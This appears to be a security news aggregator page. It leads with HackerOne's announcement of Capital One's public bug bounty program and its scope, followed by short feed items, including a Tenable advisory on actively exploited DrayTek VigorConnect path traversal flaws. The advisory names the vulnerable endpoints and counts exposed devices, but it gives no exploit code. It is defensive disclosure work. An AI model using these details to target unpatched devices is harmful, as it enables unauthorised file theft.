Capital One Launches Public Bug Bounty Program with HackerOne HackerOne Mon, 09/09/2024 - 10:42 Body What''s New? We at Capital One strongly believe in the importance of security, and part of our mission is to protect our customers and their data. As part of this commitment, we launched our private bug bounty program in 2019, inviting hackers from all over the world to find and report vulnerabilities on any of our external assets. Over the past five years, we’ve expanded, collaborated, and established ourselves as a good partner within the bug bounty community. During this time, we’ve worked with HackerOne to host multiple Live Hacking Events, focusing on securing our most critical applications. We''ve also hosted focused testing engagements to utilize the bright minds in the bug bounty community to help secure Capital One, but we don’t want to stop there. This year, we plan to take it a step further by launching Capital One’s new public bug bounty program. We invite everyone to take this step with us and join us in continuing to build and preserve a secure environment for our customers. What’s in Scope?The scope of this program will put a major focus on Capital One’s core external-facing applications. This enhanced focus will help to bolster security on our heavily used applications and ultimately provide more security for our end users. The in-scope domains include:*.capitalone.com*.capitaloneshopping.com*.capitalonegslbex.com*.capitalone.caENO Browser ExtensionCapital One Shopping Browser ExtensionMobile Apps for each of the above applications, if applicableAttack scenarios that rely on physical testing, social engineering, phishing, and denial-of-service attacks will be out of scope, as will third-party domains and assets.How Capital One Handles Vulnerabilities and DisclosuresCapital One is committed to investing in the security of our customers’ information. Our Bug Bounty team is a group of security professionals who responsibly handle all of the potential security vulnerabilities identified by hackers worldwide. Our team is steadfast in its efforts to maintain the security of our customers, actively receiving and responding to any potential security vulnerability reports we might receive through initial triage, impact assessment, and remediation to proactively safeguard our customers. As a hacker and future reporter for our program, you can expect your report to undergo an initial triage assessment and validation via our partner, HackerOne. After this, Capital One''s Bug Bounty team will perform a secondary validation where we will test and assess the impact of your submitted vulnerability and work with our internal teams to develop and implement a fix. You can expect to be kept in the loop, from validation to remediation, with transparent communication from our team being paramount. We look forward to taking this leap, as we strive to protect our customers, and hope that you choose to take the leap with us. Catch you in the logs! Excerpt Capital One has officially launched a public bug bounty program with HackerOne, partnering with ethical hackers to secure their assets and prevent security breaches. Main Image

by HackerOne

Endpoint security has been around for decades, but changes in device use and the quick evolution of new attacks have triggered the development of new security techniques.

by Dark Reading

For the latest discoveries in cyber research for the week of 9th September, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The German air traffic control agency, Deutsche Flugsicherung, has confirmed a cyberattack that impacted its administrative IT infrastructure. The extent of data accessed is still under investigation, and flight operations remained unaffected. […] The post 9th September – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Supercharge Your Writing With AI, Do It Now mantra, URL validation bypass cheat sheet, and more...

by Hive Five

by ComputerWeekly

Around two years ago, memN0ps took the initiative to create one of the first publicly available rootkit proof of concepts (PoCs) in Rust as an experimental project, while learning a new programming language. It still lacks many features, which are relatively easy to add once the concept is understood, but it was developed within a month, at a part-time capacity.

by SpiderLabs Blog

Summer is over and it’s back-to-school time, so get yourself registered now for September’s batch of timely, information-packed Barracuda webinars.

by Barracuda

With patches out for three years, attackers have set their sights on a pair of vulnerabilities affecting DrayTek VigorConnect.BackgroundIn November 2021, the Cybersecurity and Infrastructure Security Agency (CISA) launched its Known Exploited Vulnerabilities (KEV) Catalog, an effort to focus on vulnerabilities known to have been exploited and provide defenders with an actionable list of vulnerabilities to prioritize their remediation efforts. On September 3, CISA added three new vulnerabilities to the KEV, two of which were discovered and responsibly disclosed to DrayTek by security researchers from Tenable Research.CVEDescriptionCVSSv3VPRCVE-2021-20123DrayTek VigorConnect Unauthenticated Local File Inclusion / Path Traversal Vulnerability7.57.7CVE-2021-20124DrayTek VigorConnect Unauthenticated Local File Inclusion / Path Traversal Vulnerability7.57.7*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on September 9 and reflects VPR at that time.AnalysisCVE-2021-20123 and CVE-2021-20124 are local file inclusion vulnerabilities affecting the DownloadFileServlet and WebServlet endpoints on DrayTek VigorConnect, a network management software used to manage and configure DrayTek network devices. Using a specially crafted request with path traversal sequences, an unauthenticated attacker can download arbitrary files from the underlying operating system with root privileges. These vulnerabilities were discovered by researchers at Tenable and disclosed to DrayTek, which subsequently released a patch in October 2021.Despite these vulnerabilities having readily available patches for three years, nefarious actors have been observed exploiting these unpatched flaws, earning their spot on the CISA KEV list. As we’ve examined in multiple reports, including our 2020, 2021 and 2022 Threat Landscape Reports, known and exploitable vulnerabilities continue to be targeted by threat actors. Simply stated, these vulnerabilities continue to be targeted because they have well-known exploit code and actors continue to find unpatched and vulnerable targets to attack.Despite the hype, few targets appear to be publicly availableUsing platforms such as Shodan.io and a basic query for “draytek” we can see that a staggering over 700,000 assets are returned. Looking closer we note that nearly 610,000 of these devices have port 1723 open, the port used for Point-to-Point Tunneling Protocol (PPTP) on DrayTek Vigor routers. Such a vast number of internet-facing DrayTek assets makes large-scale attacks tempting to threat actors.Source: Shodan.ioYet, if we look at the number of internet-facing assets on Shodan.io, specifically for DrayTek VigorConnect based on device title, certificate elements or the hash value of its favicon, we see that only a handful of assets are exposed.Source: Shodan.ioLooking at other platforms like FOFA, using the VigorConnect favicon hash value as an example, we can see that while the number returned is larger than that of Shodan.io with 44 results (37 unique IPs) it is still a relatively small number.Source: FOFAThreat actors might target DrayTek VigorConnect, despite having fewer than 50 internet-facing assets, because of the ease of exploiting a smaller number of systems, which could be automated. Despite the size of its attack surface, VigorConnect could provide access to sensitive network configurations and its reduced complexity might allow attackers to navigate and persist undetected. This makes it a strategic target for establishing access to larger networks while staying under the radar.Attacks are on the riseCISA has not provided evidence on the source or level of attacks observed in the wild but, looking at data from Shadowserver — which provides statistics based on server-side attacks seen by their honeypot sensor network — we get some limited insights. Looking at activity for the vendor DrayTek from September 1, 2024 to September 9, the date this blog was published, we can see an uptick in activity for connections to Shadowserver devices for CVE-2021-20123 and CVE-2021-20124. It’s worth noting that while the level of activity is not huge, this is only on Shadowserver devices, which represent a small and specific subset of exposed devices reflecting CISAs warnings regarding observed active exploitation.Source: ShadowserverProof of conceptAs part of our responsible disclosure policy, Tenable regularly releases proof-of-concept (PoC) code with our Tenable Research Advisories (TRAs). In a coordinated release on October 8, 2021, Tenable released TRA-2021-42 which included PoCs for both CVE-2021-20123 and CVE-2021-20124.SolutionDrayTek released VigorConnect version 1.6.1 on October 7, 2021, to address all of the vulnerabilities reported by Tenable Research.Identifying affected systemsA list of Tenable plugins for this vulnerability can be found on the individual CVE pages for CVE-2021-20123 and CVE-2021-20124 as they’re released. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.Get more informationTenable Research Advisory TRA-2021-42DrayTek VigorConnect version 1.6.1 Security AdvisoryCISA September 3, 2024 KEV AlertJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable